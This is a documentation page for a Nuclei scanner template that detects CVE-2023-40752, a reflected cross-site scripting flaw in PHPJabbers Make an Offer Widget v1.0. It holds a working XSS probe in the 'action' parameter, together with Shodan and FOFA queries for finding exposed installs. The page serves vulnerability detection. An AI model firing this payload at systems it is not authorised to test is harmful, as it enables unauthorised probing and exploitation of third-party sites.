PHPJabbers Make an Offer Widget v1.0 - Cross-Site Scripting
ID: CVE-2023-40752
Severity: medium
Author: ritikchaddha
Tags: cve,cve2023,phpjabbers,make-an-offer-widget,xss
Description
Section titled “Description”There is a Cross Site Scripting (XSS) vulnerability in the “action” parameter of index.php in PHPJabbers Make an Offer Widget v1.0.
YAML Source
Section titled “YAML Source”id: CVE-2023-40752
info: name: PHPJabbers Make an Offer Widget v1.0 - Cross-Site Scripting author: ritikchaddha severity: medium description: | There is a Cross Site Scripting (XSS) vulnerability in the "action" parameter of index.php in PHPJabbers Make an Offer Widget v1.0. reference: - https://medium.com/@tfortinsec/multiple-vulnerabilities-in-phpjabbers-part-3-40fc3565982f - https://nvd.nist.gov/vuln/detail/CVE-2023-40752 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-40752 cwe-id: CWE-79 cpe: cpe:2.3:a:phpjabbers:make_an_offer_widget:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: html:"PHPJabbers" fofa-query: body="PHPJabbers" vendor: phpjabbers product: make_an_offer_widget tags: cve,cve2023,phpjabbers,make-an-offer-widget,xss
http: - method: POST path: - "{{BaseURL}}/index.php?controller=pjAdmin&action=%3Cimg+src%3Dx+onerror%3Dprompt%28document.domain%29%3E"
matchers-condition: and matchers: - type: word part: body words: - "<img src=x onerror=prompt(document.domain)>" - "didn't exists" condition: and
- type: word part: content_type words: - text/html
- type: status status: - 200# digest: 490a0046304402206e487fda687d29f2005a3575541e904a175bfb2f4518d12c5c335bb5a876410202200ed2b8ead24f0015788842a963a6211322cef00623d37b01b2ec8557f3ae75db:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-40752.yaml"